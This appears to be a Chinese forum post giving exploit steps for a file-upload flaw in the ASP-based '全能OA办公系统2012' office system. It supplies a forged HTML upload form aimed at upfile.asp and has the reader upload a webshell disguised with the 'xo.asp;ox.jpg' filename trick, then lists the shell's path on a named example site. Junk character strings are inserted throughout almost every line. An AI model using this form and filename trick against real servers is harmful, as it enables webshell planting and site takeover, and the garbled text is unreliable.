全能OA办公系统 上传漏洞
0 Z' e6 B8 J, ~" y# ~& A& Y) j: n6 u- w! T. Z6 g5 t" M
系统介绍:# @( ^, T6 f6 |9 J( \$ A( w
( n' v$ a) w: i+ T$ W
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。" g4 m+ \5 s r% F
' b/ G$ J4 Q! t% c }
主要功能:
( P0 ~4 b) _& `* g1 d公司通告
~! i) m6 B3 W7 a: {# [工作计划
- F* l5 L5 y+ D A& ]8 |5 N' n! Z通讯助理
% c" A0 [( }6 ~客户资源 5 c6 b6 {' O' c/ {# s- z# p( Z
我的公文
2 B" D1 v1 i) q% C' k$ h2 _4 m公文传阅
% X& t0 o5 ] M# _. C公共资源 0 y+ F4 l; D( j7 l. ^9 ?
资源预约
+ U) A- Q, m( T今日考勤
1 M' C2 s1 N. l: @9 J! s# d2 V个人计划 0 b% _/ g2 N8 i Z( G
个人通讯录 % p* F4 }/ z E$ G+ B0 B) S2 W
个人基本档案 " W8 S+ ?5 U. X6 Y7 ]4 D1 w
未读邮件
" X4 H6 ^% U+ q1 a+ `7 Z发邮件 H- h- S5 c( B8 }% f0 Y# X( }
收件夹 # a3 r4 a4 e( w. ]( o9 F
寄件夹 2 P) a4 z5 A3 {: J9 m
网络硬盘 7 S7 h2 N4 i3 R; C4 b% L
网络会议 & b4 m) ?! m+ g
网络调查 # q' s( r- k0 e7 G
交流论坛# F, K( R6 k+ E1 V2 k( Q! P
) @, B) V% c2 q& x有兴趣测试的朋友可以下源码看看; r! E; }5 V- C# w* `# L7 s6 v
6 n. b( F4 X, m+ X- }7 J. L6 N+ |
源码下载:4 b! k$ g# a/ d5 \* @9 D
|0 t6 ?% k G* `0 s
http://www.mycodes.net/30/4750.htm
+ u) S$ y g8 c. i! P; x, s. ?' G( `; B) n( M3 [
漏洞介绍:; x- {) @& q9 R; Q: \2 ?: Q
% b3 W' e! H H5 Y r由upfile.asp上传文件漏洞引起7 i f# Q, j& e! u
! }2 U) b+ S5 `$ l& I8 j测试方法:8 x& l" \! y: I8 s( n3 c
- L! \: P1 E% P4 }+ s b+ V9 w' b
使用名小子上传http://www.itlynn.com/upfile.asp即可$ g9 e. v# R( R( B9 E* h' q7 P! p2 P
0 x" w, _2 Y' G/ m0 l
如果upfile.asp文件被删除不存在。
! j5 `' j: F& b" |! t4 h* x" m' ?
那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
7 N! w; t; v- y7 f$ w- @' m4 I9 M" l
如果存在那么将如下代码保存为upfile.html。0 y2 m8 a @% G9 Q$ I3 ]# F R
$ I( w% D1 v3 M& \然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。3 B: V: I8 q" ~ Y
! C! x" g0 n7 F 0 _$ S3 g- ~4 z
. {$ l. ?2 N" n
01 <table border='0' align="center" cellpadding="5">
$ K& i- V( ]) n) S$ z: M
. ^6 X% I, ?; z( r1 e% n: g8 ~* j02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> 6 a, g1 X1 X2 {' S
( `% {: ~9 m& e/ k: ^03 <tr> ; T8 P3 h* D9 I/ \5 T: k; A, K
2 l- D7 d$ U7 g$ ?2 z04 <td>报错:</td> 2 e8 ?& n5 A4 q% A
' l; t9 r) w$ w4 V- n6 \. N05 <td><input type='radio' name='errnumber' value='0'> $ c% p1 g5 F" W
7 U" b! \( ]( E$ i7 z: g06 自动更名 + r/ A2 p2 T1 g2 f
9 {& i; P( M5 ?! X: g07 <input type='radio' name='errnumber' value='1' checked>
" A$ M; m, ~! r1 [; ~
4 E9 A$ H d4 |' ]; [) r7 G) z08 报错方式 / R3 v5 ~' N C# u
/ x- |; c6 D: c) ?09 <input type='radio' name='errnumber' value='2'>
# o1 p3 E) m: z2 A
1 |) P! P, }- C0 f& ]) {4 X. s10 直接覆盖</td>
) T; L0 g. k/ U4 x( s
6 N* m, O6 e& d- [11 </tr> S0 |+ g5 [& F! y; x- g/ s/ R/ J2 ?
- z; \7 x; I U. U" R+ \4 N12 <tr>
. v, t3 P$ V- l# v
$ {0 P! @) n2 m2 N13 <td>主题:</td> ; A# ?. i9 M& L8 N* k U
% D! Y, v/ B6 C4 k
14 <td><input type='text' name='filename' size='30'></td> + `# W- L: x4 X# k6 w0 s& N
! {. L0 @- V& C' ^( ?( A5 h4 m15 </tr>
7 v3 f, E, B# B$ ]
# v0 F+ i; w+ ]16 <tr>
7 T h' ^! e# ]$ l3 }3 G
1 d$ y5 ]/ O1 u; @$ D8 y: o$ P# s17 <td>文件:</td>
" D+ _( m, A: g% l
& ?4 @5 e1 V* m4 V5 l/ d; f7 i* O+ ^$ W18 <td><input type="file"name="fruit"size="30"></td>
- L( y& Q2 I7 U8 ? s- P0 _6 u
5 Y' o$ N5 G8 n" L o6 ~* ~' D19 </tr>
' u9 h! @0 H- n9 \; \. k7 J1 {0 I+ w2 y; H0 d( N6 ~' k$ F' O
20 <tr> ! u& {5 O6 ^$ W0 ^5 _: a6 K
5 c G, Z. Z% r2 L% L3 O7 Q21 <td valign='top'>简介:</td> % M5 ?' f' o( H |: `" k/ j; i& }( G
5 @4 }8 k- Y- T: g% `
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> , ^3 [' ^5 R4 V: W
) }* w. K! g5 O+ A* C* H, [6 n
23 </tr> % U$ S0 ~: j0 k' K' O A$ E
: Q4 K( z% f* S$ n0 z. o# l& i24
8 U4 }& k1 Q+ G
, ?1 n1 ]: t" F25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> ! Z4 \$ K6 a Y
9 u6 \: Y2 H" q: f( l+ G2 X
26 </tr> # F b0 j4 S! f+ T
5 v; z4 k4 k$ B2 b; Z27 </form>
+ ]- ]; t) X1 Y, _6 Q# {1 Z0 X: b8 m) }5 P# d( S
然后打开上传一个文件名为xo.asp;ox.jpg的文件。5 {$ j, H8 k) |6 K W
* f* K& ]8 d* P8 G& ]
$ t" l0 {) R! x+ J8 S& g
7 V" W- ]: A9 S6 C' O( o7 N
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
% P. K+ m4 s- n$ @ A5 j X$ d5 y/ Q0 V. P% Z G! G1 \6 G
此漏洞需要配合解析漏洞利用。3 r0 k. r4 ]- } G
* W$ _" t! z @3 a/ p. O- Q/ d
|